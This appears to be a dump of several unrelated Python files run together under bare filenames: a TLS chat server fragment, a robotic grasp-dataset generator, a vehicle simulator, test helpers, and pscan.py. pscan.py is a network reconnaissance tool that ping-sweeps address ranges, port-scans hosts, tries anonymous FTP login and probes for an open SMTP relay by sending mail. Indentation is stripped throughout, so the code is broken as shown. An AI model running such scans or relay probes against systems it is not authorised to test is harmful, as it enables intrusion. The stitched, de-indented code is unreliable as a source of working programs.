#print(f"Nome do individuo: {client_user.name}")
clients.append(client_user)
#print(list(map(lambda x: f"Nome do individuo: {x.name}",clients)))
#print("OLA")
lock.release()
return False
elif message.find("getsalt") != -1:
#print(f"conteudo: {message}")
get_salt(message.split(".__.")[1],client_socket)
return False
else:
#print(message)
try:
splitted = message.split('.|||.')
usrname = splitted[0]
message = splitted[1]
#print(usrname)
#print(message)
client_user = get_client(usrname,client_socket)
for cl in clients:
if cl.name == client_user.name:
cl.socket_info = client_user.socket_info
except Exception as e:
print("antes dos ifs")
print(message)
print(e.args)
if message.find("startGROUP") != -1:
try:
message = message.removeprefix("startGROUP")
#print(message)
messages = message.split(".__.")
members_names = messages[0:-2]
group_name = messages[-2]
signature = messages[-1]
#print(group_name)
#print(members_names)
hand_shake_point_2_point(members_names,client_user,clients,group_name,signature)
return False
except Exception as e:
print("STARTGROUP ERROR")
print(e.args)
elif message.find("privateMSG") != -1:
try:
#print(f"msg: {message}")
talk(message.removeprefix("privateMSG"),client_user,clients)
#print("FIND")
return False
except Exception as e:
print("privateMSG")
print(e.args)
elif message.find("globalMSG") != -1:
try:
#print("global!!!")
broadcast(client_user,message.removeprefix("globalMSG"))
return False
except Exception as e:
print("GLOBAL-CHAT ERROR")
print(e.args)
elif message.find("exit") != -1:
return True
except Exception as e:
#return True
print(e.args)
return True
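# Message formats handled by parseInput (inferred from the parsing above; the
# ".__." / ".|||." separators and prefixes must match whatever the client sends):
#   "register<payload>"                                        -> create_user_db
#   "login<payload>"                                           -> login_client
#   "getsalt.__.<username>"                                    -> get_salt
#   "<user>.|||.startGROUP<m1>.__....<group_name>.__.<signature>" -> group handshake
#   "<user>.|||.privateMSG<payload>"                           -> private message
#   "<user>.|||.globalMSG<text>"                               -> broadcast to all other clients
#   "<user>.|||.exit"                                          -> close the connection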
# Main function to receive the clients connection
def receive() -> None:
#print('Server is running and listening ...')
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain('/etc/letsencrypt/live/apolircs.asuscomm.com/fullchain.pem', '/etc/letsencrypt/live/apolircs.asuscomm.com/privkey.pem')
thread:threading.Thread
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind((host, port))
server.listen(10)
with context.wrap_socket(server, server_side=True) as sserver:
#print(sserver.version())
while True:
client, address = sserver.accept()
online_client_sockets.append(client)
print(f'connection is established with {str(address)}')
thread = threading.Thread(target=handle_client, args=([client]))
thread.start()
if __name__ == "__main__":
receive()
|
generate-dataset-canny.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author : Hongzhuo Liang
# E-mail : liang@informatik.uni-hamburg.de
# Description:
# Date : 20/05/2018 2:45 PM
# File Name : generate-dataset-canny.py
import numpy as np
import sys
import pickle
from dexnet.grasping.quality import PointGraspMetrics3D
from dexnet.grasping import GaussianGraspSampler, AntipodalGraspSampler, UniformGraspSampler, GpgGraspSampler
from dexnet.grasping import RobotGripper, GraspableObject3D, GraspQualityConfigFactory, PointGraspSampler
import dexnet
from autolab_core import YamlConfig
from meshpy.obj_file import ObjFile
from meshpy.sdf_file import SdfFile
import os
import multiprocessing
import matplotlib.pyplot as plt
plt.switch_backend('agg')  # for convenience when running on a remote computer
def get_file_name(file_dir_):
file_list = []
for root, dirs, files in os.walk(file_dir_):
if root.count('/') == file_dir_.count('/') + 1:
file_list.append(root)
file_list.sort()
return file_list
def do_job(i):
object_name = file_list_all[i][len(home_dir) + 48:-12]
    good_grasp = multiprocessing.Manager().list()  # shared list for storing good grasps
    p_set = [multiprocessing.Process(target=worker, args=(i, 100, 20, good_grasp)) for _ in  # sample count and grasp poses per friction coefficient
             range(25)]  # grasp_amount per friction: 20*40
[p.start() for p in p_set]
[p.join() for p in p_set]
good_grasp = list(good_grasp)
good_grasp_file_name = "./generated_grasps/{}_{}_{}".format(filename_prefix, str(object_name), str(len(good_grasp)))
if not os.path.exists('./generated_grasps/'):
os.mkdir('./generated_grasps/')
print("\033[0;32m%s\033[0m" % "[INFO] Save good grasp file:" + good_grasp_file_name)
with open(good_grasp_file_name + '.pickle', 'wb') as f:
pickle.dump(good_grasp, f)
tmp = []
for grasp in good_grasp:
grasp_config = grasp[0].configuration
score_friction = grasp[1]
score_canny = grasp[2]
tmp.append(np.concatenate([grasp_config, [score_friction, score_canny]]))
np.save(good_grasp_file_name + '.npy', np.array(tmp))
print("\nfinished job ", object_name)
def worker(i, sample_nums, grasp_amount, good_grasp):
object_name = file_list_all[i][len(home_dir) + 48:-12]
print('a worker of task {} start'.format(object_name))
yaml_config = YamlConfig(home_dir + "/Projects/PointNetGPD/dex-net/test/config.yaml")
gripper_name = 'robotiq_85'
gripper = RobotGripper.load(gripper_name, home_dir + "/Projects/PointNetGPD/dex-net/data/grippers")
grasp_sample_method = "antipodal"
if grasp_sample_method == "uniform":
ags = UniformGraspSampler(gripper, yaml_config)
elif grasp_sample_method == "gaussian":
ags = GaussianGraspSampler(gripper, yaml_config)
elif grasp_sample_method == "antipodal":
ags = AntipodalGraspSampler(gripper, yaml_config)
elif grasp_sample_method == "gpg":
ags = GpgGraspSampler(gripper, yaml_config)
elif grasp_sample_method == "point":
ags = PointGraspSampler(gripper, yaml_config)
else:
raise NameError("Can't support this sampler")
print("Log: do job", i)
if os.path.exists(str(file_list_all[i]) + "/nontextured.obj"):
of = ObjFile(str(file_list_all[i]) + "/nontextured.obj")
sf = SdfFile(str(file_list_all[i]) + "/nontextured.sdf")
else:
print("can't find any obj or sdf file!")
raise NameError("can't find any obj or sdf file!")
mesh = of.read()
sdf = sf.read()
obj = GraspableObject3D(sdf, mesh)
print("Log: opened object", i + 1, object_name)
force_closure_quality_config = {}
canny_quality_config = {}
fc_list_sub1 = np.arange(2.0, 0.75, -0.4)
fc_list_sub2 = np.arange(0.5, 0.36, -0.05)
    fc_list = np.concatenate([fc_list_sub1, fc_list_sub2])  # friction coefficient list fc_list [2. 1.6 1.2 0.8 0.5 0.45 0.4 ]
print("fc_list", fc_list, "fc_list[-1]", fc_list[-1])
for value_fc in fc_list:
value_fc = round(value_fc, 2)
yaml_config['metrics']['force_closure']['friction_coef'] = value_fc
yaml_config['metrics']['robust_ferrari_canny']['friction_coef'] = value_fc
force_closure_quality_config[value_fc] = GraspQualityConfigFactory.create_config(
yaml_config['metrics']['force_closure'])
canny_quality_config[value_fc] = GraspQualityConfigFactory.create_config(
yaml_config['metrics']['robust_ferrari_canny'])
good_count_perfect = np.zeros(len(fc_list))
count = 0
minimum_grasp_per_fc = grasp_amount
    # generate some grasps for each friction coefficient
while np.sum(good_count_perfect < minimum_grasp_per_fc) != 0 and good_count_perfect[-1] < minimum_grasp_per_fc:
print("[INFO]:good | mini", good_count_perfect, minimum_grasp_per_fc)
print("[INFO]:good < mini", good_count_perfect < minimum_grasp_per_fc,
np.sum(good_count_perfect < minimum_grasp_per_fc))
        grasps = ags.generate_grasps(obj, target_num_grasps=sample_nums, grasp_gen_mult=10,  # generate grasp poses
                                     vis=False, random_approach_angle=True)  # randomize the approach angle
print("\033[0;32m%s\033[0m" % "[INFO] Worker{} generate {} grasps.".format(i, len(grasps)))
count += len(grasps)
        for j in grasps:  # iterate over the generated grasps; check force closure and find each grasp's friction coefficient
tmp, is_force_closure = False, False
            for ind_, value_fc in enumerate(fc_list):  # assign each grasp to a friction coefficient
value_fc = round(value_fc, 2)
tmp = is_force_closure
                is_force_closure = PointGraspMetrics3D.grasp_quality(j, obj,  # evaluate the grasp under friction coefficient value_fc
force_closure_quality_config[value_fc], vis=False)
print("[INFO] is_force_closure:", is_force_closure, "value_fc:", value_fc, "tmp:", tmp)
                if tmp and not is_force_closure:  # force-closure at the previous friction coefficient but not the current one, so the previous value is this grasp's minimum friction coefficient
print("[debug] tmp and not is_force_closure")
if good_count_perfect[ind_ - 1] < minimum_grasp_per_fc:
canny_quality = PointGraspMetrics3D.grasp_quality(j, obj,
canny_quality_config[
round(fc_list[ind_ - 1], 2)],
vis=False)
                        good_grasp.append((j, round(fc_list[ind_ - 1], 2), canny_quality))  # keep the grasp under the previous friction coefficient
good_count_perfect[ind_ - 1] += 1
break
                elif is_force_closure and value_fc == fc_list[-1]:  # force-closure at the smallest friction coefficient
print("[debug] is_force_closure and value_fc == fc_list[-1]")
if good_count_perfect[ind_] < minimum_grasp_per_fc:
canny_quality = PointGraspMetrics3D.grasp_quality(j, obj,
canny_quality_config[value_fc], vis=False)
good_grasp.append((j, value_fc, canny_quality))
good_count_perfect[ind_] += 1
break
print('Worker:', i, 'Object:{} GoodGrasp:{}'.format(object_name, good_count_perfect))
object_name_len = len(object_name)
object_name_ = str(object_name) + " " * (25 - object_name_len)
if count == 0:
good_grasp_rate = 0
else:
good_grasp_rate = len(good_grasp) / count
print('Worker:', i, 'Gripper:{} Object:{} Rate:{:.4f} {}/{}'.
format(gripper_name, object_name_, good_grasp_rate, len(good_grasp), count))
if __name__ == '__main__':
if len(sys.argv) > 1:
filename_prefix = sys.argv[1]
else:
filename_prefix = "default"
home_dir = os.environ['HOME']
file_dir = home_dir + "/Projects/PointNetGPD/dataset/ycb_meshes_google/"
file_list_all = get_file_name(file_dir)
    object_numbers = len(file_list_all)
print("[file_list_all]:", file_list_all, object_numbers, "\n")
job_list = np.arange(object_numbers)
job_list = list(job_list)
    pool_size = 1  # number of jobs run at the same time
assert (pool_size <= len(job_list))
# Initialize pool
pool = []
for _ in range(pool_size):
job_i = job_list.pop(0)
pool.append(multiprocessing.Process(target=do_job, args=(job_i,)))
[p.start() for p in pool]
# refill
while len(job_list) > 0:
for ind, p in enumerate(pool):
if not p.is_alive():
pool.pop(ind)
job_i = job_list.pop(0)
p = multiprocessing.Process(target=do_job, args=(job_i,))
p.start()
pool.append(p)
break
print('All job done.')
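# Example invocation (illustrative): `python generate-dataset-canny.py ycb` writes, per object,
# ./generated_grasps/ycb_<object_name>_<number_of_good_grasps>.pickle and the matching .npy file.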
|
pscan.py
|
#!/usr/bin/python3
#Title: pscan.py
#Author: ApexPredator
#License: MIT
#Github: https://github.com/ApexPredator-InfoSec/pscan
#Description: This script performs a ping sweep to find active hosts and then performs a port scan on the active hosts.
import argparse
import os
import subprocess
import socket
import multiprocessing
import requests
from ftplib import FTP
from smtplib import SMTP
from ipaddress import ip_network
from colorama import init, Fore
parser = argparse.ArgumentParser(prog='pscan.py', usage='python3 -t <target> -p <port to scan>\npython3 pscan.py -t 8.8.8.8 -p 80\npython3 pscan.py -c 192.168.1.0/24 -a') #build argument list
parser.add_argument('-t', '--target', help='Target IP', required=False)
parser.add_argument('-f', '--file', help='File Containing Target URLs', required=False)
parser.add_argument('-c', '--cidr', help='Target IP block in CIDR notation', required=False)
parser.add_argument('-cf', '--cfile', help='File Containing Target IP Block in CIDR notation', required=False)
parser.add_argument('-p', '--port', help='port to scan', required=False)
parser.add_argument('-tp', '--topports', help="Scan top ports: pass 10, 100, or 1000", required=False)
parser.add_argument('-a', '--all', help="Scan all ports 0-65535 - This is slow", required=False, action='store_true')
args = parser.parse_args()
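# Additional example invocations for the arguments above (illustrative target files):
#   python3 pscan.py -f targets.txt -tp 100     # hosts from a file, nmap top 100 ports
#   python3 pscan.py -cf cidrs.txt -p 22        # CIDR blocks from a file, single port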
def scan(ip, ports):
    spool_size = 200 # port scan multiprocessing pool size; reduce if you receive errors about too many open files
sjobs = multiprocessing.Queue() # port scan jobs queue
sresults = multiprocessing.Queue() # port scan results queue
spool = [ multiprocessing.Process(target=pscan, args=(ip, sjobs,sresults)) for i in range(spool_size) ] # set up the port scan multiprocessing pool
for p in spool: # start the pool
p.start()
for p in range(len(ports)): # loop thru all the ports
sjobs.put(ports[p]) # add the ports to the jobs queue
for p in spool:
sjobs.put(None)
    for p in spool: # join the port scan worker processes
p.join()
while not sresults.empty():
resport = sresults.get() # get results from pscan
init() # add color, remove all {GREEN}, {RED}, {RESET}, and init() references if colorama is not installed on host
GREEN = Fore.GREEN
RESET = Fore.RESET
RED = Fore.RED
print(f"[+] {GREEN}{ip}:{resport}{RESET} is open!")
if resport == 80: # if port 80 is open attempt to pull robots.txt
print("[+] Detected web server on %s. Attempting to pull robots.txt...." %ip)
            robots = requests.get('http://%s/robots.txt' %ip) # attempt to pull robots.txt
            print(robots.text)
if resport == 21: # if port 21 is open attempt anonymous login and directory listing
print("[+] Detected FTP server on %s. Attempting anonymous login...." %ip)
try:
ftp = FTP(ip) # connect to FTP server
ftp.login() # test anonymous login
print(f"[+] Anonymous login {GREEN} sucessful!{RESET}") # display login success message
print(f"[+] Attemping directory listing....")
ftp.retrlines('LIST') # print a directory listing of the FTP directory
except:
print(f"[-] Anonymous login {RED} failed!{RESET}") # display fail message
if resport == 25: # if port 25 is open test to send e-mail without authentication
print("[+] Detected SMTP server on %s. Attempting anonyous relay...." %ip)
try:
smtp = SMTP(ip) # connect to SMTP server
msg = "From: attacker@test.com\n" # this is the e-mail message
msg += "To: victim@test.coml\n"
msg += "Date: today\n"
msg += "Subject: Anonymous SMTP relay\n"
msg += "Content-type: text/html\n\n"
msg += "Anonymous relay!"
msg += '\r\n\r\n'
smtp.sendmail("attacker@test.com", "victim@test.com", msg) # attempt to send mail
print(f"[+] Anonymous STMP relay send mail {GREEN}successful!{RESET}") # dispaly success message
except:
print(f"[-] Anonymous SMTP send mail {RED}failed!") # display fail message
return
def pscan(ip, sjobs_q, sresults_q): # the port scan function
    while True: # loop thru receiving ports
port = sjobs_q.get() # get ports from sjobs queue
if port is None: # break loop if no port
break
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # TCP socket
s.settimeout(1) # set timeout to 1 second, increase if high latency to reduce false negative, lower to speed up scan
try:
s.connect((ip,port)) # connect to the provided IP and port
s.close() # terminate connection after test
sresults_q.put(port) # return open port results
except:
s.close() # terminate connection
pass # don't return results if port is closed
return
def sweep(job_q, results_q): # the ping sweep function
DEVNULL = open(os.devnull,'w') # set up devnull so ping command results aren't displayed on console
    while True: # loop thru received IPs from job queue
ip = job_q.get() # get IP from job queue
if ip is None: # break loop if no IP
break
try:
subprocess.check_call(['ping','-c1',ip],stdout=DEVNULL) # send one ping to determine if host is active
results_q.put(ip) # return IP if host is active
except:
pass # don't return result if host isn't active
return
def main():
print("[+] Starting ping sweep to find active hosts.....")
    pool_size = 255 # multiprocessing pool size for ping sweep; reduce if you receive errors about too many open files
global ips #global to use in other functions
ips = [] # list to hold active hosts IPs
jobs = multiprocessing.Queue() # queue for jobs
results = multiprocessing.Queue() # queue for results
pool = [ multiprocessing.Process(target=sweep, args=(jobs,results)) for i in range(pool_size) ] # setup the multiprocessing pool
for p in pool: #start the jobs pool
p.start()
    if args.target: #test if -t or --target was passed and set target with value passed
target = args.target
jobs.put(target) #add IP to jobs queue
elif args.file: #test if -f or --file were passed and set target with file named passed
file = args.file
with open(file, 'r') as target_list: #open file passed
for line in target_list.readlines(): #read the lines in
target = line.strip() #set target
jobs.put(target) # add IP to jobs queue
elif args.cidr:
for ip in ip_network(args.cidr): #read in CIDR notation and break them in to individual IPs
target = str(ip) #set target to current IP from CIDR block
jobs.put(target) # add IP to jobs queue
elif args.cfile:
cfile = args.cfile #set cfile to file passed with -cf or --cfile argument
with open(cfile, 'r') as target_list: #open the file for reading
for line in target_list.readlines(): #read each line
target = line.strip() #set target to current line CIDR notation IP block
for ip in ip_network(target): #break CIDR notation down to individual IPs
targetc = str(ip) #set target to current IP from CIDR block
jobs.put(targetc) # add ip to jobs queue
for p in pool:
jobs.put(None)
for p in pool: #join the jobs
p.join()
while not results.empty(): # loop thru results
res = results.get() #get results from sweep()
init() # add some color, remove if colorama isn't on host
GREEN = Fore.GREEN # add some color, remove if colorama isn't on host
RESET = Fore.RESET # add some color, remove if colorama isn't on host
print(f"[+] {GREEN}{res}{RESET} is active!") # remove {GREEB}{RESET} if colorama module is not installed
ips.append(res) # add ip if active host to ips list
if args.all:
ports = list(range(0,65536)) # all ports 0-65535
print("[+] All ports option selected....this will take a while....")
elif args.port:
        ports = [int(args.port)] # single port passed with -p/--port
elif args.topports == '10': # nmap top 10 ports
ports =[21,22,23,25,80,110,139,443,445,3389]
elif args.topports == '100': # nmap top 100 ports
ports = [7,9,13,21,22,23,25,26,37,53,79,80,81,88,106,110,111,113,119,135,139,143,144,179,199,389,427,443,445,465,513,514,515,543,544,548,554,587,631,646,873,990,993,995,1025,1026,1027,1028,1029,1110,1433,1720,1723,1755,1900,2000,2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000,6001,6646,7070,8000,8008,8009,8080,8081,8443,8888,9100,9999,10000,32768,49152,49153,49154,49155,49156,49157]
elif args.topports == '1000': # nmap top 1000 ports
        ports = [1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,49,53,70,79,80,81,82,83,84,85,88,89,90,99,100,106,109,110,111,113,119,125,135,139,143,144,146,161,163,179,199,211,212,222,254,255,256,259,264,280,301,306,311,340,366,389,406,407,416,417,425,427,443,444,445,458,464,465,481,497,500,512,513,514,515,524,541,543,544,545,548,554,555,563,587,593,616,617,625,631,636,646,648,666,667,668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800,801,808,843,873,880,888,898,900,901,902,903,911,912,981,987,990,992,993,995,999,1000,1001,1002,1007,1009,1010,1011,1021,1022,1023,1024,1025,1026,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037,1038,1039,1040,1041,1042,1043,1044,1045,1046,1047,1048,1049,1050,1051,1052,1053,1054,1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1065,1066,1067,1068,1069,1070,1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1083,1084,1085,1086,1087,1088,1089,1090,1091,1092,1093,1094,1095,1096,1097,1098,1099,1100,1102,1104,1105,1106,1107,1108,1110,1111,1112,1113,1114,1117,1119,1121,1122,1123,1124,1126,1130,1131,1132,1137,1138,1141,1145,1147,1148,1149,1151,1152,1154,1163,1164,1165,1166,1169,1174,1175,1183,1185,1186,1187,1192,1198,1199,1201,1213,1216,1217,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287,1296,1300,1301,1309,1310,1311,1322,1328,1334,1352,1417,1433,1434,1443,1455,1461,1494,1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700,1717,1718,1719,1720,1721,1723,1755,1761,1782,1783,1801,1805,1812,1839,1840,1862,1863,1864,1875,1900,1914,1935,1947,1971,1972,1974,1984,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,2013,2020,2021,2022,2030,2033,2034,2035,2038,2040,2041,2042,2043,2045,2046,2047,2048,2049,2065,2068,2099,2100,2103,2105,2106,2107,2111,2119,2121,2126,2135,2144,2160,2161,2170,2179,2190,2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381,2382,2383,2393,2394,2399,2401,2492,2500,2522,2525,2557,2601,2602,2604,2605,2607,2608,2638,2701,2702,2710,2717,2718,2725,2800,2809,2811,2869,2875,2909,2910,2920,2967,2968,2998,3000,3001,3003,3005,3006,3007,3011,3013,3017,3030,3031,3052,3071,3077,3128,3168,3211,3221,3260,3261,3268,3269,3283,3300,3301,3306,3322,3323,3324,3325,3333,3351,3367,3369,3370,3371,3372,3389,3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689,3690,3703,3737,3766,3784,3800,3801,3809,3814,3826,3827,3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000,4001,4002,4003,4004,4005,4006,4045,4111,4125,4126,4129,4224,4242,4279,4321,4343,4443,4444,4445,4446,4449,4550,4567,4662,4848,4899,4900,4998,5000,5001,5002,5003,5004,5009,5030,5033,5050,5051,5054,5060,5061,5080,5087,5100,5101,5102,5120,5190,5200,5214,5221,5222,5225,5226,5269,5280,5298,5357,5405,5414,5431,5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678,5679,5718,5730,5800,5801,5802,5810,5811,5815,5822,5825,5850,5859,5862,5877,5900,5901,5902,5903,5904,5906,5907,5910,5911,5915,5922,5925,5950,5952,5959,5960,5961,5962,5963,5987,5988,5989,5998,5999,6000,6001,6002,6003,6004,6005,6006,6007,6009,6025,6059,6100,6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565,6566,6567,6580,6646,6666,6667,6668,6669,6689,6692,6699,6779,6788,6789,6792,6839,6881,6901,6969,7000,7001,7002,7004,7007,7019,7025,7070,7100,7103,7106,7200,7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777,7778,7800,7911,7920,7921,7937,7938,7999,8000,8001,8002,8007,8008,8009,8010,8011,8021,8022,8031,8042,8045,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8093,8099,8100,8180,8181,8192,8193,8194,
                 8200,8222,8254,8290,8291,8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651,8652,8654,8701,8800,8873,8888,8899,8994,9000,9001,9002,9003,9009,9010,9011,9040,9050,9071,9080,9081,9090,9091,9099,9100,9101,9102,9103,9110,9111,9200,9207,9220,9290,9415,9418,9485,9500,9502,9503,9535,9575,9593,9594,9595,9618,9666,9876,9877,9878,9898,9900,9917,9929,9943,9944,9968,9998,9999,10000,10001,10002,10003,10004,10009,10010,10012,10024,10025,10082,10180,10215,10243,10566,10616,10617,10621,10626,10628,10629,10778,11110,11111,11967,12000,12174,12265,12345,13456,13722,13782,13783,14000,14238,14441,14442,15000,15002,15003,15004,15660,15742,16000,16001,16012,16016,16018,16080,16113,16992,16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221,20222,20828,21571,22939,23502,24444,24800,25734,25735,26214,27000,27352,27353,27355,27356,27715,28201,30000,30718,30951,31038,31337,32768,32769,32770,32771,32772,32773,32774,32775,32776,32777,32778,32779,32780,32781,32782,32783,32784,32785,33354,33899,34571,34572,34573,35500,38292,40193,40911,41511,42510,44176,44442,44443,44501,45100,48080,49152,49153,49154,49155,49156,49157,49158,49159,49160,49161,49163,49165,49167,49175,49176,49400,49999,50000,50001,50002,50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055,55056,55555,55600,56737,56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389]
else:
ports = [80, 22, 21, 20, 443, 8080] # default ports if none passed
print("[+] Starting port scan for active hosts....")
for i in range(len(ips)): # loop thru the active hosts found during ping sweep and pass them to port scanner
scan(ips[i], ports)
if __name__ == '__main__':
main()
|
BWSI_FrontSeat.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 17 16:18:55 2021
This is the simulated Sandshark front seat
@author: BWSI AUV Challenge Instructional Staff
"""
import sys
from BWSI_Sandshark import Sandshark
from BWSI_BuoyField import BuoyField
from Sandshark_Interface import SandsharkServer
import threading
import time
import datetime
import numpy as np
import matplotlib.pyplot as plt
class FrontSeat():
# we assign the mission parameters on init
def __init__(self, port=8000, warp=1):
# start up the vehicle, in setpoint mode
self.__datum = (42.3, -71.1)
self.__vehicle = Sandshark(latlon=self.__datum,
depth=1.0,
speed_knots=0.0,
heading=45.0,
rudder_position=0.0,
engine_speed='STOP',
engine_direction='AHEAD',
datum=self.__datum)
# front seat acts as server
self.__server = SandsharkServer(port=port)
self.__current_time = datetime.datetime.utcnow().timestamp()
self.__start_time = self.__current_time
self.__warp = warp
self.__position_history = list()
self.__doPlots = True
# has heard from the backseat
self.__isConnected = False
def run(self):
try:
# start up the server
server = threading.Thread(target=self.__server.run, args=())
server.start()
if self.__doPlots:
fig = plt.figure()
ax = fig.add_subplot(111)
self.__simField = BuoyField(self.__datum)
config = {'nGates': 5,
'gate_spacing': 5,
'gate_width': 2,
'style': 'pool_1',
'max_offset': 5,
'heading': 45}
self.__simField.configure(config)
G, R = self.__simField.get_buoy_positions()
green_buoys = np.asarray(G)
red_buoys = np.asarray(R)
count = 0
while True:
now = datetime.datetime.utcnow().timestamp()
delta_time = (now-self.__current_time) * self.__warp
msg = self.__vehicle.update_state(delta_time)
self.__server.send_command(msg)
self.__current_time = now
msgs = self.__server.receive_mail()
if len(msgs) > 0:
self.__isConnected = True
print("\nReceived from backseat:")
for msg in msgs:
print(f"{str(msg, 'utf-8')}")
self.parse_payload_command(str(msg, 'utf-8'))
if self.__doPlots and self.__isConnected:
current_position = self.__vehicle.get_position()
self.__position_history.append(current_position)
ax.clear()
ax.plot(green_buoys[:,0], green_buoys[:,1], 'go')
ax.plot(red_buoys[:,0], red_buoys[:,1], 'ro')
trk = np.array(self.__position_history)
ax.plot(trk[-10:,0], trk[-10:,1], 'k')
ax.set_xlim(current_position[0]-10, current_position[0]+10)
ax.set_ylim(current_position[1]-10, current_position[1]+10)
ax.set_aspect('equal')
plt.pause(0.01)
plt.draw()
count += 1
time.sleep(.2/self.__warp)
except Exception as e:
print(e)
self.__server.cleanup()
server.join()
def parse_payload_command(self, msg):
# the only one I care about for now is BPRMB
print(f"Parsing {msg}")
payld = msg.split('*')
vals = payld[0].split(',')
if vals[0] == '$BPRMB':
print("Here!")
# heading / rudder request
if vals[2] != '':
print("Here?")
heading_mode = int(vals[7])
if heading_mode == 0:
# this is a heading request!
print("SORRY, I DO NOT ACCEPT HEADING REQUESTS! I ONLY HAVE CAMERA SENSOR!")
elif heading_mode == 1:
# this is a rudder adjustment!
rudder = float(vals[2])
print(f"SETTING RUDDER TO {rudder} DEGREES")
self.__vehicle.set_rudder(rudder)
# speed request
if vals[5] != '':
speed_mode = int(vals[6])
if speed_mode == 0:
RPM = int(vals[5])
print(f"SETTING THRUSTER TO {RPM} RPM")
self.__vehicle.set_rpm(RPM)
elif speed_mode == 1:
# speed_request
print("SORRY, RPM SPEED REQUESTS ONLY! I HAVE NO GPS!")
def main():
if len(sys.argv) > 1:
port = sys.argv[1]
else:
port = 29500
print(f"port = {port}")
front_seat = FrontSeat(port=port)
front_seat.run()
if __name__ == '__main__':
main()
|
test_multi_task_helper.py
|
# built in libraries
import threading
import multiprocessing
import collections
def process_runner(error_ret, func, *args, **kwargs):
"""
info: will run the task
    :param error_ret: Queue: a way to return an error
:param func: function
:param args: tuple
:param kwargs: dict
:return:
"""
try:
func(*args, **kwargs)
except Exception as e:
error_ret.put(e)
class MultiTaskHelper:
_Task = collections.namedtuple("Task", ("func", "args", "kwargs"))
def multiple_threads_helper(self, tasks, timeout=120):
"""
info: will run tasks in a thread
:param tasks: list or tuple: [(func, tuple, dict), ...]
:param timeout: int
:return:
"""
def _not_main_task(task, time):
"""
info: will run task in a thread and return an error
:param task: tuple or list: (func, tuple, dict)
:param time:
:return: Exception or None
"""
error = []
def thread_runner(error_ret, func, *args, **kwargs):
"""
info: will run the task
                :param error_ret: list: a way to return an error
:param func: function
:param args: tuple
:param kwargs: dict
:return:
"""
try:
func(*args, **kwargs)
except Exception as e:
error_ret.append(e)
try:
thread = threading.Thread(target=thread_runner,
args=(error, task.func,) + task.args,
kwargs=task.kwargs,
daemon=True)
thread.start()
thread.join(timeout=time)
# return error
if error:
return error[0]
except Exception as e:
return e
self._multiple_helper(tasks, _not_main_task, timeout)
def multiple_processes_helper(self, tasks, timeout=120):
"""
        info: will run tasks in separate processes
:param tasks: list or tuple: [(func, tuple, dict), ...]
:param timeout: int
:return:
"""
def _not_main_task(task, time):
"""
            info: will run task in a process and return an error
:param task: tuple or list: (func, *args, **kwargs)
:param time:
:return: Exception or None
"""
error = multiprocessing.Queue()
process = multiprocessing.Process(target=process_runner,
args=(error, task.func,) + task.args,
kwargs=task.kwargs,
daemon=True)
try:
process.start()
process.join(timeout=time)
# return error
if not error.empty():
return error.get()
except Exception as e:
return e
self._multiple_helper(tasks, _not_main_task, timeout)
@staticmethod
def _multiple_helper(tasks, not_main_task, timeout):
def runner(this_task, error_list):
"""
info: will run a task
:param this_task: Task
:param error_list: list
:return: Thread
"""
def runner_thread():
"""
info: runner thread
:return:
"""
try:
task_error = not_main_task(this_task, timeout)
if task_error is not None:
error_list.append(task_error)
except Exception as e:
error_list.append(e)
thread = threading.Thread(target=runner_thread, daemon=True)
thread.start()
return thread
# run every task as the main task
for main_spot, main_task in enumerate(tasks):
errors = []
threads = []
# run every other task as not the main task
for spot, task in enumerate(tasks):
if main_spot != spot:
threads.append(runner(task, errors))
main_task.func(*main_task.args, **main_task.kwargs)
# wait for all threads to return
for done_thread in threads:
done_thread.join(timeout)
            # check if any errors were raised
if errors:
raise errors[0]
@classmethod
def task(cls, func, *args, **kwargs):
"""
info: will make a Task
:param func: Function
:param args: tuple
:param kwargs: dict
:return: Task
"""
return cls._Task(func, args, kwargs)
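# Minimal usage sketch (illustrative; `writer` and `reader` are hypothetical
# task functions, not part of this module):
#
#   class MyCase(MultiTaskHelper, unittest.TestCase):
#       def test_concurrent_io(self):
#           def writer(): ...
#           def reader(): ...
#           self.multiple_threads_helper([self.task(writer), self.task(reader)],
#                                        timeout=30)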
|
test_s3boto3.py
|
import gzip
import pickle
import threading
from datetime import datetime
from textwrap import dedent
from unittest import mock, skipIf
from urllib.parse import urlparse
from botocore.exceptions import ClientError
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.files.base import ContentFile
from django.test import TestCase, override_settings
from django.utils.timezone import is_aware, utc
from storages.backends import s3boto3
class S3Boto3TestCase(TestCase):
def setUp(self):
self.storage = s3boto3.S3Boto3Storage()
self.storage._connections.connection = mock.MagicMock()
class S3Boto3StorageTests(S3Boto3TestCase):
def test_clean_name(self):
"""
Test the base case of _clean_name
"""
path = self.storage._clean_name("path/to/somewhere")
